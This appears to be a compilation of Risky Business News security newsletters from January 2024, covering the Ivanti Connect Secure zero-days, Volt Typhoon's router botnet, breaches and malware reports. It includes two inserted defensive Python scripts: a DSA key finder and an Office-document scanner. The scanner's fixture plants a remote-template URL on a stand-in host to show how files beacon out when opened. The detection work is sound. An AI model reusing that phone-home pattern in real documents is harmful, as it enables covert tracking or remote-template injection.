Connect Secure mass-exploitation: More than 1,700 Ivanti Connect Secure VPN appliances have been compromised using two recently disclosed zero-days. The devices were compromised by a Chinese state-sponsored group that has been using the zero-days since early December. According to security firm Volexity, the APT group ramped up operations on January 10 after Ivanti publicly warned customers of the two vulnerabilities. Patches for the two zero-days are expected on January 22. Several security researchers who've been tracking the attacks say that customers who did not apply Ivanti's temporary mitigations are most likely compromised already. More than 6,800 Connect Secure (formerly Pulse Secure) servers are currently exposed online and vulnerable to attacks.

A world map showing the location of vulnerable Ivanti Connect Secure VPNs
Image: Shadowserver Foundation

Vulnerabilities, security research, and bug bounty

PAX POS vulnerabilities: STM Cyber has found six vulnerabilities in Android-based PAX POS devices. The company has published details on five of the six.

LeftoverLocals vulnerability: Security firm Trail of Bits has discovered a vulnerability that affects GPU cards from AMD, Apple, Qualcomm, and Imagination. Named LeftoverLocals, the vulnerability allows threat actors to bypass memory isolation and recover data from other processes running on the same GPU. Trail of Bits says that while LeftoverLocals impacts the security posture of GPUs as a whole, the vulnerability is particularly dangerous for GPU platforms that run LLMs and ML models.

PixieFail vulnerabilities: French cybersecurity firm Quarkslab has identified nine vulnerabilities in EDK II, an open-source implementation of the UEFI standard. Codenamed PixieFail, the vulnerabilities reside in the EDK II network stack. Quarkslab says the bugs can be exploited by remote attackers during a computer's boot-up process to execute malicious code, poison DNS records, or hijack network sessions.

Opera MyFlow vulnerability: Security researchers have discovered a major vulnerability in MyFlow, a feature of the Opera browser that lets users sync files between devices. Attackers could abuse the feature to execute malicious files without user interaction on both Windows and macOS systems. Guardio Labs say Opera fixed the bug on November 22, but they are not releasing any proof-of-concept because of concern that Opera's existing browser architecture remains at high risk for exploitation.

Chrome zero-day: Google has released an update for its Chrome browser to fix an actively exploited zero-day tracked as CVE-2024-0519.

Citrix zero-days: Citrix has released security updates to patch two zero-days in NetScaler ADC and NetScaler Gateway appliances. Tracked as CVE-2023-6548 and CVE-2023-6549, the two are described as authenticated remote code execution and denial of service vulnerabilities. The company says it observed exploits for both CVEs against devices in the wild.

VMware security update: Software vendor VMware has published a security update to fix a missing access control vulnerability in its Aria product line. The vulnerability (CVE-2023-34063) has a severity score of 9.9/10 and can allow unauthorized access to customer systems.

Atlassian security update: Atlassian has published a security update to patch 29 vulnerabilities across several of its products. The worst of these bugs is a template injection vulnerability that allows unauthenticated, remote attackers to run malicious code on Confluence servers. Tracked as CVE-2023-22527, the vulnerability received a rare 10/10 severity score. Atlassian says the bug impacts all Confluence servers in its 8.x series released before December 5, 2023.

Infosec industry

New tool—KEV Detector: Security firm Ostorlab has released KEV Detector, a tool that automates the detection of known exploited vulnerabilities. Its detections are sourced from CISA's KEV database as well as Google Tsunami, Ostorlab's own Agent Asteroid, and some bug bounty programs.

New tool—SuperSharpShares: Security firm Lares has open-sourced a tool named SuperSharpShares that automates enumerating domain shares, allowing for quick verification of accessible shares in an associated domain.

New tool—iShutdown: Russian security firm Kaspersky has released iShutdown, a collection of Python scripts that can detect various strains of iOS spyware, such as Pegasus, Predator, and Reign.

Acquisition news: DevSecOps company Snyk has acquired AppSec runtime provider Helios.

Pwn2Own Vancouver 2024 program: The program for the spring version of Pwn2Own 2024 has been announced. Besides web browsers, virtualization software, servers, and enterprise software, this year, ZDI added a new cloud-native and container category. Slack has also been added to the target pool in the enterprise category. The cash prize pool is $1,000,000.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.

Risky Biz News: Chinese APT hacks 30% of Cisco RV320/325 routers

15 January 2024 at 00:30

This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A Chinese state-sponsored espionage group has compromised and is currently controlling roughly 30% of all Cisco RV320 and Cisco RV325 WAN routers across the internet.

Active infections were spotted by SecurityScorecard's STRIKE Team over the past 37 days, between December 1, 2023, and January 7, 2024.

The routers are infected with and are part of KV, a botnet first spotted by internet infrastructure company Lumen last month. According to Lumen, the same botnet also consists of a large number of DrayTek Vigor routers, NETGEAR ProSAFE firewalls, and Axis security cameras.

The botnet is operated by Chinese APT Volt Typhoon. The group is the infosec industry's current Chinese cyber-threat-du-jour. First exposed in May of 2023, the group has been linked to a covert Chinese effort to breach US critical communications infrastructure.

Reporting citing government sources claimed the group was doing the equivalent of "war pre-position" by planting its seeds in critical US infrastructure that could be exploited in the case of a possible military conflict in the Pacific to hinder the US' response in the region.

The initial Microsoft report that exposed Volt Typhoon operations noted that the group was using compromised SOHO devices to proxy and hide its command and control infrastructure from infected hosts and network defenders. The subsequent Lumen report confirmed this particular detail, and Lumen provided both more details and IOCs about Volt Typhoon's proxy network—aka the KV botnet.

SecurityScorecard says it used the Lumen findings and internet netflow data to determine the targets of Volt Typhoon attacks by looking at which networks the infected Cisco devices communicated with once they got infected.

The company says it identified 27 IP addresses hosting a total of 69 US, UK, Australian, and Indian government sites.

While the report basically confirms for the first time that Volt Typhoon has targeted other countries besides the US, it is, honestly, not that surprising.

A map showing the location of infected Cisco RV320 and RV325 routers

Breaches, hacks, and security incidents

Framework data breach: Laptop maker Framework says the data of an unknown number of customers was stolen after a security breach at its external accounting provider.

Hathway data leak: A hacker claims to have stolen the data of more than 41.5 million customers of Indian internet service provider Hathway. The hacker has leaked the data of 4.6 million users as proof of their claim. They have also set up a dark web portal where Hathway customers can check if they are affected by the breach. The ISP has yet to acknowledge the incident. [Additional coverage in RestorePrivacy]

Screenshot of the dark web site where the Hathway data search portal is located

General tech and privacy

HelloFresh fined for spamming: The UK's privacy watchdog has fined grocery delivery service HelloFresh £140,000 for sending marketing spam to UK customers. The ICO says HelloFresh sent more than 79 million spam emails and one million spam texts, even to customers who canceled their subscriptions.

eBay fined in 2019 harassment case: eBay has agreed to pay a $3 million fine to settle a DOJ lawsuit accusing the company of orchestrating a harassment and intimidation campaign. The company admitted that its security team harassed a US couple who ran a newsletter that negatively reviewed eBay products. eBay's former Senior Director of Safety and Security and six members of the company's security team posted negative comments on the newsletter's articles and a bunch of way way waaaaaaay more creepy stuff—see below.

"The campaign included sending anonymous and disturbing deliveries to the victims' home, including a book on surviving the death of a spouse, a bloody pig mask, a fetal pig and a funeral wreath and live insects; sending private Twitter messages and public tweets criticizing the newsletter’s content and threatening to visit the victims in Natick; and traveling to Natick to surveil the victims and install a GPS tracking device on their car. The harassment also featured Craigslist posts inviting the public for sexual encounters at the victims' home."

Users are worth less: A Raptive study estimates that the general value of a user's data is now worth 30% less after Google's migration from cookie-based tracking technology to its Privacy Sandbox system. [Additional coverage in Gizmodo]

YouTube sabotages ad block users (again): Instead of cleaning its scummy and scammy ad platform, YouTube is now slowing video buffers for users with an ad-blocker installed.

VMware license drama: VMware customers are reporting issues with renewing their licenses. [Additional coverage in BornCity]

"After the Broadcom takeover, absolute chaos reigns. Dealers have been terminated, orders via OEMs are sometimes impossible, and the end customer portal for license activation has been shut down."

Bitwarden adds passkeys: Password manager Bitwarden has added support for passkeys.

OpenSSH removes DSA: The OpenSSH project has announced plans to remove support for DSA keys. OpenSSH has disabled DSA keys by default since 2015 but has retained optional support. A full DSA removal is planned for January 2025.
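As an added example (not OpenSSH project code), the Python below scans authorized_keys or known_hosts text for DSA keys ahead of the removal. It reads the algorithm name from inside the base64 blob rather than trusting the text label, because the blob's first length-prefixed string is what sshd actually parses, so a mislabelled key is still caught. The sample lines and blobs are constructed for the demo and are not real keys.

```python
"""Find DSA (ssh-dss) keys in authorized_keys / known_hosts style files.

Added example, not OpenSSH project code. Relies only on the public-key wire
format (RFC 4253 length-prefixed strings) and the authorized_keys line syntax.
"""
from __future__ import annotations

import base64
import shlex
import struct
from typing import Optional

KEY_TYPES = (
    "ssh-dss", "ssh-rsa", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)


def blob_key_type(b64: str) -> Optional[str]:
    """Return the algorithm name embedded in a base64 public key blob.

    Every OpenSSH public key blob starts with a 4-byte big-endian length and
    the algorithm name; that field is authoritative, the text label is not.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) < 4:
        return None
    (n,) = struct.unpack(">I", raw[:4])
    if n > len(raw) - 4:
        return None
    return raw[4:4 + n].decode("ascii", errors="replace")


def parse_key_line(line: str) -> Optional[tuple[str, str, str]]:
    """Return (label, blob, comment) for a key line, or None for blanks/comments.

    Options such as command="..." may precede the key type and may contain
    quoted spaces, so the line is tokenised with shlex rather than split().
    known_hosts lines (hostnames first) parse the same way.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    try:
        tokens = shlex.split(line, posix=True)
    except ValueError:  # unbalanced quotes in a comment etc.
        return None
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            return tok, tokens[i + 1], " ".join(tokens[i + 2:])
    return None


def find_dsa_keys(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, reason, comment) for every DSA key found in text."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        parsed = parse_key_line(line)
        if parsed is None:
            continue
        label, blob, comment = parsed
        if blob_key_type(blob) == "ssh-dss":
            reason = "ssh-dss" if label == "ssh-dss" else f"blob is ssh-dss but labelled {label}"
            hits.append((no, reason, comment))
    return hits


def _fake_blob(alg: str) -> str:
    """Constructed blob that only carries the algorithm name; not a usable key."""
    body = struct.pack(">I", len(alg)) + alg.encode() + b"\x00" * 16
    return base64.b64encode(body).decode()


# Constructed sample file (not real keys): one clean key, one DSA key behind
# options, one DSA blob mislabelled as RSA, and one known_hosts-style line.
SAMPLE = "\n".join([
    "# constructed sample, not real keys",
    f"ssh-ed25519 {_fake_blob('ssh-ed25519')} alice@laptop",
    f'command="/usr/bin/backup",no-pty ssh-dss {_fake_blob("ssh-dss")} backup@nas',
    f"ssh-rsa {_fake_blob('ssh-dss')} mislabelled@host",
    f"github.example ssh-dss {_fake_blob('ssh-dss')}",
])

if __name__ == "__main__":
    for no, reason, comment in find_dsa_keys(SAMPLE):
        print(f"line {no}: {reason} {comment}".rstrip())
```

Run it against `~/.ssh/authorized_keys`, `~/.ssh/known_hosts` and `/etc/ssh/ssh_host_dsa_key.pub` on hosts you manage; any hit is a key that stops working once DSA support is gone.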

ModSecurity moves to OWASP: Security firm Trustwave has transferred stewardship of the ModSecurity open-source web application firewall (WAF) engine to the OWASP Foundation. Trustwave, which has maintained ModSecurity since 2010, is relinquishing the project after the company itself was sold by SingTel to the MC2 Security Fund earlier this month. The OWASP Foundation is a community-led nonprofit that runs several cybersecurity initiatives and open-source projects.

Screenshot of a tweet from Ivan Ristic, ModSecurity creator

Government, politics, and policy

FCC addresses domestic abuse: FCC Chairwoman Jessica Rosenworcel has sent letters to nine automakers and three mobile operators to seek their help in protecting victims of domestic abuse. The FCC Chair is reacting to multiple incidents of abusers tracking their victims using data from connected cars and mobile devices. The letter has asked companies to reveal what kind of data they collect from users and how domestic abuse survivors can be protected.

US federal cybersecurity education requirements: The Biden administration is working to remove the requirement for four-year degrees for some federal cybersecurity jobs. The upcoming change comes as part of the White House's efforts to boost hiring of cybersecurity professionals in federal agencies. Efforts to improve diversity in cybersecurity hiring are also underway, officials said. [Additional coverage in CyberScoop]

CDP analysis: The US Government Accountability Office has looked at the activity of the Bureau of Cyberspace and Digital Policy (CDP), a bureau established by the State Department in April 2022 to tackle and promote cybersecurity policies at the foreign affairs and diplomacy level. The GAO gave the bureau a generally positive review. [Additional coverage in NextGov]

NFT scammer charged: US prosecutors have charged an active duty US Air Force cyber analyst for running an NFT scam named UndeadApes. [Additional coverage in Forbes]

Canada hires SecurityScorecard: The Canadian government has signed a partnership with security firm SecurityScorecard to provide security ratings for government and critical infrastructure resources as a way to assess their cybersecurity posture. [Additional coverage in the Vancouver Sun]

Swiss bulk collection scandal: Reporters from Swiss digital magazine Republik have published part one of a three-part series that covers how the Swiss intelligence services are abusing their powers for bulk data collection of all Swiss internet traffic, and not just cross-border communications. The report covers how Swiss intelligence services have ignored safeguards and protections and are now seeking to legalize their current practices and even expand their surveillance powers.

The Great Russian SIM Purge: Russian telecommunications watchdog Roskomnadzor has disabled more than 600,000 gray SIM cards. The agency says it sent notifications to more than 43 million SIM cards that did not have ownership details with mobile operators. SIM card owners had until the end of December to register their information with their operator. There are more than 351 million phone numbers registered in Russia. [Additional coverage in Vedomosti]

Sponsor section

In this Risky Business News sponsor interview Tom Uren talks to Ken Westin, Field CISO at Panther about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.

Cybercrime and threat intel

Cryptominer arrested in Ukraine: Europol and Ukraine's Cyber Police detained a man from the city of Mykolaiv for running a crypto-mining botnet. The 29-year-old suspect used brute-force attacks to break into cloud provider accounts and install crypto-mining malware. Officials say the suspect made over $2 million from the scheme.

Malware author detained in Belarus: Belarusian authorities have arrested a 35-year-old man from Voronovo on charges of developing malware. Authorities say the suspect sold the malware for $100 to customers in China and former Soviet states. The malware was described as a program designed to bypass protections and access account data on online sites.

Phisher sentenced in Russia: A Russian man from the city of Bryansk has been sentenced to one year in prison for launching phishing attacks against Russian government agencies. Officials say the suspect tried to collect login credentials for future attacks. He allegedly launched the attacks from his workplace. [Additional coverage in TASS]

Hacker detained in the Philippines: Philippine authorities have arrested a 47-year-old man on charges of allegedly targeting foreigners with illegal online activities. Named Edgar Silvano, the man previously served a prison sentence for hacking-related charges in the early 2000s, when he was also described as "Asia's best hacker." [Additional coverage in PhilStar, via DataBreaches.net]

Russian independent journalists targeted: A mysterious threat actor is targeting Russian independent journalists with spear-phishing attacks designed to collect their email login credentials. The attackers pose as fellow journalists from other Russian outlets and claim the target has stolen their article. Russian journalists working for Baza and the OCCRP confirmed to have been targeted. They warn fellow reporters to be extremely careful after several Kremlin critics lost their lives since Russia's invasion of Ukraine.

Screenshot of a tweet from an OCCRP reporter about the phishing attacks

MSIX malware campaigns: Red Canary researchers have taken a look at all the recent malspam campaigns that are using MSIX files for the initial infection, a rising trend that has forced Microsoft to disable the ms-appinstaller (MSIX) protocol handler in Windows. However, as Red Canary points out, we're not out of the woods just yet.

"Microsoft chose to leave the protocol disabled by default, requiring a configuration change to enable it. As with previous encounters with MSIX files, this disabling solution does not fully eliminate the threat of MSIX files, it merely requires the malicious MSIX files to be intentionally downloaded to disk before execution."

Phishing attacks: Spotify and View Card users are currently being targeted with phishing emails.

New npm malware: Thirty-six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Solana wallet drainers: ScamSniffer researchers have tracked a group that has stolen nearly $4.17 million in crypto assets from about 4,000 Solana users. The campaign used Twitter replies that lured users to phishing sites that drained their Solana funds and NFTs. The campaign is the latest in a recent trend where cybercrime groups are using phishing kits specialized in automatically draining compromised crypto-wallets. These kits are known as "wallet drainers."

Growth in malicious botnets: Network security company Netscout has seen a spike in malicious botnets performing reconnaissance scanning operations. The company says it observed tens of thousands of devices performing malicious scans in December 2023. Peaks varied from 35,000 to 143,000 daily distinct scanning devices. The number is well above the 10,000 daily average the company saw last year.

Netscout chart showing spike in scans

Malware technical reports

Phemedrone Stealer: Trend Micro looks at Phemedrone Stealer, a new infostealer currently distributed in the wild with the help of a Windows SmartScreen bypass (CVE-2023-36025).

Shiz: Chinese security firm Tinder Security has published a report on Shiz, an infostealer and browser hijacker.

WorkersDevBackdoor: eSentire has analyzed a malvertising campaign from November 2023 that deployed the WorkersDevBackdoor on infected hosts.

Rimasuta: QiAnXin researchers have analyzed recent changes in Rimasuta, one of the many Mirai malware variants out there in the wild. This particular strain has been in the wild since June 2021 and is also known as Mirai_ptea.

Hunters International: Broadcom has published a summary analysis of Hunters International, a dual-extortion ransomware operation.

Sponsor section

A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.

APTs, cyber-espionage, and info-ops

Ivanti attacks: Mandiant has published its own report on the recently disclosed Ivanti zero-days, complementing Volexity's original report. Mandiant says it tracks the attacking group as UNC5221. Volexity's name for the group is UTA0178.

APT28's OceanMap: Malware researcher Niraj S. has published an analysis of OceanMap, a backdoor strain operated by the APT28 Russian cyber-espionage group.

Vulnerabilities, security research, and bug bounty

Juniper security updates: American networking equipment vendor Juniper has released three security updates for its switches and firewall devices. The worst of the three is a pre-auth RCE (CVE-2024-21591) in the devices' J-Web management interface. Juniper has released firmware patches and has recommended that customers disable the J-Web interface until patches are applied. The vulnerability is very likely to be exploited in the wild. According to Censys, there are more than 11,500 Juniper devices with J-Web enabled on the internet.

GitLab security updates: Code management platform GitLab has released a security update to address five vulnerabilities. The most critical issue is a bug tracked as CVE-2023-7028 that can allow threat actors to take over accounts using the platform's password reset feature. User accounts with 2FA enabled are not vulnerable to this attack. The proof-of-concept is apparently ridiculously simple.

Apple keyboard fixes: Apple has fixed a hijack vulnerability in its Bluetooth keyboards discovered by Skysafe security researcher Marc Newlin last year. Android fixes were released in December.

PaperCut WebDAV RCE: Horizon3 has published a technical deep-dive into a PaperCut WebDAV vulnerability (CVE-2023-39143) it found last year and can be used for RCE scenarios. The vulnerability was patched last July.

NextGen Mirth Connect RCE: Horizon3 has also published a technical deep-dive into a pre-auth RCE (CVE-2023-43208) it found in NextGen Mirth Connect, an open-source healthcare data integration platform. This one was patched last October.

XAML Diagnostics bug: Island's Michael Maltsev has published more details on CVE-2023-36003, an EoP vulnerability in XAML Diagnostics, a library used by several Microsoft system utilities.

Ivanti zero-days: watchTowr Labs researchers claim they were able to create PoCs for the two recently disclosed Ivanti Pulse Secure zero-days in less than 48 hours after their disclosure. It's not the first of such claims, and several PoCs appear to have already been created, although none were publicly released at the time of writing.

LATAM app vulnerabilities: CitizenLab and the Open Technology Fund have published a joint report containing details about vulnerabilities in several mobile apps used across Latin America.

Infosec industry

BSides Berlin 2023 videos: Talks from the BSides Berlin 2023 security conference, which took place in November 2023, are now available on YouTube.

Last Shmoocon: The organizers of the Shmoocon security conference have announced that next year's edition (2025) will be the conference's last one.

Industry moves: Brad Arkin has joined Salesforce as the company's new Chief Trust Officer. Arkin served as Cisco's Chief Security and Trust Officer from March 2020 to December 2023. He previously served as Adobe's Chief Security Officer for seven years. [Additional coverage in SecurityWeek]

Free security help for NGOs: The CyberPeace Institute has published a rundown of all the cyberattacks that targeted its staff and operations over the past two years. The organization says it will offer free cybersecurity assistance and expertise to any other NGO that needs such help.

Ghost jobs: Something we missed from last August was this study from StandoutCV that found that almost half of the job listings for cybersecurity analysts in the UK were "ghost jobs."

"They’re used by employers to build a candidate pool, make the company look like it’s actively hiring (therefore growing), or are left by recruiters who simply forget to take them down."

New tool—Canary Token Scanner: The NeroTeam Security Labs (or NSLabs) has released Canary Token Scanner, a script designed to proactively identify Canary Tokens within Microsoft Office documents (docx, xlsx, pptx).
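To show what such a scanner actually looks for, here is an added example (not NSLabs' Canary Token Scanner and not its code). A docx/xlsx/pptx is a zip of XML parts; relationships marked TargetMode="External" with an http(s) target are resolved when Office renders the file, which is how document-based Canary Tokens, and remote-template injection, phone home. The sample document, the token URL and the set of auto-fetched relationship types are constructed assumptions for the demo.

```python
"""Flag Office Open XML relationships that make Office fetch a remote URL.

Added example, not the NSLabs Canary Token Scanner. It unzips the document,
parses every .rels part and reports external http(s) relationships.
"""
from __future__ import annotations

import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types resolved on open without a click (assumption made by this
# example; a hyperlink, by contrast, only fires when the user clicks it).
AUTO_FETCH_TYPES = {"attachedTemplate", "image", "oleObject"}


def external_targets(data: bytes) -> list[tuple[str, str, str]]:
    """Return (part name, relationship type, URL) for every external http(s) relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if re.match(r"(?i)^https?://", target):
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rtype, target))
    return hits


def phone_home_targets(data: bytes) -> list[tuple[str, str, str]]:
    """Only the external relationships that fire on open: likely tokens or remote templates."""
    return [h for h in external_targets(data) if h[1] in AUTO_FETCH_TYPES]


def _rels(*rows: str) -> str:
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">' + "".join(rows) + "</Relationships>"
    )


def build_sample_docx() -> bytes:
    """Constructed minimal .docx: an internal rel, a hyperlink, and a remote template (not a real token)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", _rels(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>',
            f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>',
        ))
        zf.writestr("word/_rels/settings.xml.rels", _rels(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
            'Target="http://token.example.invalid/t.dotm" TargetMode="External"/>',
        ))
    return buf.getvalue()


if __name__ == "__main__":
    for part, rtype, url in phone_home_targets(build_sample_docx()):
        print(f"{part}: {rtype} -> {url}")
```

Point `external_targets` at real files (`open(path, "rb").read()`) to triage a batch of documents; the hyperlink entries are worth listing but it is the attachedTemplate and image relationships that beacon out the moment the file is opened.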

New tool—Talkback: Security firm Elttam has published a technical explanation (I guess it's a formal launch) of how its Talkback infosec aggregator works.

New tool—Exploit Observer: Security firm A.R.P. Syndicate has launched Exploit Observer, a free API that returns information about exploits available for a certain technology or vulnerability.

Output of the Exploit Observer API

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk with infosec and anti-virus veteran Martijn Grooten about how the infosec industry has changed over the years.

Risky Biz News: Chinese APT exploits two Pulse Secure zero-days

12 January 2024 at 00:30

This newsletter is brought to you by Stairwell. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

A Chinese state-sponsored hacking group has exploited two zero-days in Ivanti Connect Secure VPN appliances (formerly known as Pulse Secure) to gain access to corporate networks.

The zero-days were discovered by American cybersecurity firm Volexity, which attributed the attacks to a group it tracks as UTA0178.

Ivanti has published mitigations and workarounds that customers can apply until firmware patches are released on January 22.

The two zero-days are an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) that can be chained together to run malicious code on remote Pulse Secure devices.

UTA0178 abused the zero-days primarily as an initial entry vector. After gaining access to Pulse Secure appliances, the attackers installed JavaScript keyloggers that collected user credentials, which they later used to move inside internal networks.

Once inside, UTA0178 installed a new web shell named GLASSTOKEN on internal servers and externally facing devices.

Operators then used a network of hacked Sophos Cyberoam firewalls as proxies and connected to the web shells in order to disguise their real location and collect data from compromised victims.

Volexity says it traced UTA0178 attacks as early as December 3, 2023.

Ivanti says it is "aware of less than 10 customers impacted by the vulnerabilities."

The security firm has published a list of IOCs from the incidents it investigated. It urged Pulse Secure customers to use the IOCs to scan for possible compromises of their internal networks.

Both Volexity and Ivanti warn that applying firmware patches will only prevent future exploitation with the two zero-days but will not remove UTA0178 from already compromised networks. Organizations with Pulse Secure devices will have to scan networks and remove the attacker's web shells on their own.

"The anticipated wait time for a patch is several weeks – some product users will have to wait until February for a patch," Satnam Narang, senior staff research engineer at Tenable, told Risky Business.

"As soon as a proof of concept is available for this exploit chain, we expect malicious activity to spike, especially based on historical activity targeting these products."

More than 16,000 Ivanti Pulse Secure appliances will need patches in the coming weeks. Scans to identify Pulse Secure devices have already begun, according to Rapid7.

Apparently, the two zero-days have been collectively nicknamed "ConnectAround."


Breaches, hacks, and security incidents

Chattr.ai leak: AI hiring tool Chattr left its Firebase database exposed on the internet and leaked its customers' information, two security researchers have found. The company's AI hiring tool is primarily used in the US fast food industry. Its customers include some of the world's largest companies, such as McDonald's, KFC, Taco Bell, Target, Applebee's, Arby's, and Subway. The database exposed information on job applicants, franchise managers, and Chattr employees alike.

Maldives attacks: An Indian hacktivist group named TeaM NETWORK9 has defaced multiple Maldives government websites in a series of attacks this week. The attacks came after three local politicians made inappropriate public remarks about Indian Prime Minister Narendra Modi after he urged Indians to vacation in India's own Lakshadweep Islands instead of the Maldives. The Maldives government has since apologized for the statements. [Additional coverage in The Week]

Taiwan cyberattacks: Taiwanese organizations are seeing a flood of cyberattacks and espionage operations ahead of the country's election this weekend. [Additional coverage in Politico]

SEC Twitter account hack: A threat actor has hijacked the Twitter account of the US Securities and Exchange Commission and published a tweet claiming the agency had approved the trade of exchange-traded funds (ETFs). The incident is the latest in a long list of similar hacks of official Twitter accounts. Previous hacks have also hit companies like Mandiant, Hyundai, Netgear, CertiK, CoinGecko, and Bloomberg Crypto. Security firm CloudSEK previously reported about the rise of a new marketplace advertising access to compromised Twitter "gold" business accounts. [Additional coverage in TechCrunch]

General tech and privacy

Fortnite refunds deadline extended: The FTC has extended the deadline for parents to submit claims and receive compensation from Epic Games. The game maker agreed last year to pay $245 million to parents whose kids were tricked into making unwanted purchases in the company's Fortnite game. The FTC notified parents via email in September 2023, and parents could have filed claims until January 17 this year. The new deadline is February 29.

FTC bans data broker: The FTC has banned data broker Outlogic (formerly X-Mode Social) from selling precise location data of American citizens. The agency says the sale of such data violates consumers' rights to privacy. The FTC says past X-Mode/Outlogic location data was used to expose visits to sensitive locations such as medical clinics, places of religious worship, and domestic abuse shelters. The agency argued that such data could be used to expose consumers to potential discrimination, physical violence, emotional distress, and other harms. Outlogic becomes the first US data broker to receive this type of ban.

Twitter bans: The "fReE sPeEcH" absolutists at Twitter have banned a large number of accounts for prominent journalists and left-wing political commentators. [Additional coverage in Vice]

Twitter slashes trust and safety team: Twitter has fired a third of its trust and safety team since Musk's acquisition, according to Australia’s online safety watchdog.

Meta GDPR complaint: EU privacy-focused foundation Noyb has filed a GDPR complaint against American social media company Meta. The complaint claims Meta ignores EU users' right to withdraw their consent to be tracked online. Noyb says users of Meta services can't withdraw their consent unless they become paid Meta users, which costs €250/year. The complaint was filed in Austria.

Microsoft EU Data Boundary: Microsoft has announced the EU Data Boundary, a new feature that will let EU organizations store customer data on EU servers only. The new feature will be available for the company's Azure, Microsoft 365, Power Platform, and Dynamics 365 services. Microsoft says some data may be transferred to its US infrastructure for crucial cybersecurity functions, but such transfers will be documented.

Iran's Wikipedia campaign: Pro-Iranian editors are conducting a campaign to alter or delete Wikipedia pages describing its human rights and other abuses. Massive edits were made to Wikipedia's Persian pages, with recent edits now also being made on the English version. The modifications or page deletions were spotted on articles about mass killings, assassinations, and dissidents. The edits were spotted by a Wikipedia editor who shared his findings with journalists after the site failed to take action. [Additional coverage in The Australian]

Government, politics, and policy

New Russian legislation: The Russian government is working on a draft law that will force any website that allows users to "exchange messages" to register with Roskomnadzor, the country's internet watchdog. Websites that fail to do so may be fined or blocked inside RuNet, Russia's internal internet. [Additional coverage in Kommersant]

US cybersecurity requirements for hospitals: The White House will unveil new cybersecurity requirements for US hospitals in the upcoming months. The new rules will require hospitals to establish basic cybersecurity defenses in order to receive federal funding. The US government is pushing the new requirements in the aftermath of a wave of incidents that has crippled hundreds of hospitals across the US over the past year. The US hospital industry previously vowed to fight any new rulemaking. [Additional coverage in The Messenger]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Chris St Myers, Stairwell's head of threat research, about managing the risk from software you absolutely must use.

Cybercrime and threat intel

ShinyHunters member sentenced: A US judge has sentenced a French hacker to three years in prison for hacking, wire fraud, and identity theft charges. Sebastien Raoult was a member of the ShinyHunters group, where he operated under the Sezyo Kaizen nickname. He pleaded guilty to hacking and selling the data of more than 60 companies on underground hacking forums. As part of the sentence, Raoult will also have to pay $5 million in restitution for his crimes. [h/t Gabriel Thierry]

CLINKSINK campaign: Mandiant has published details on CLINKSINK, a campaign that uses scams posted on hacked Twitter accounts to lure users to a crypto-drainer phishing kit and steal users' cryptocurrency funds. This is the same campaign that posted a scam on Mandiant's Twitter account at the start of the year.

OPAU (OpAustralia): On December 22, several Indonesian hacktivist groups launched OPAU (OpAustralia), a campaign of attacks against Australian organizations. The reason for the campaign is just as stupid as you think it is—because most hacktivist campaigns are stupid like this.

"The trigger for this campaign was an article from 25 April 2023 that reported on the KKB, who has conducted attacks on the Indonesian military in West Papua. Within the article, it's reported that the KKB has asked Australia for weapons. (The Australian government has not provided any weapons to the group)."

Akira attacks: Finland's cybersecurity agency has published three security alerts over the past weeks warning local organizations about an increase in attacks from the Akira ransomware group. The agency says the intrusions typically occurred after the gang exploited vulnerabilities in Cisco ASA and FTD devices. NCSC-FI says that in several cases, the attackers also wiped NAS and tape backups before encrypting files.

Jenkins brute-force campaign: Jenkins servers are currently seeing some brute-force attacks, per SANS ISC.

Apache exploitation: A threat actor is exploiting Apache Hadoop and Flink servers to deploy rootkits and cryptominers. The attacks have taken place over the past weeks; the same threat actor previously targeted Redis and Spring servers as well.

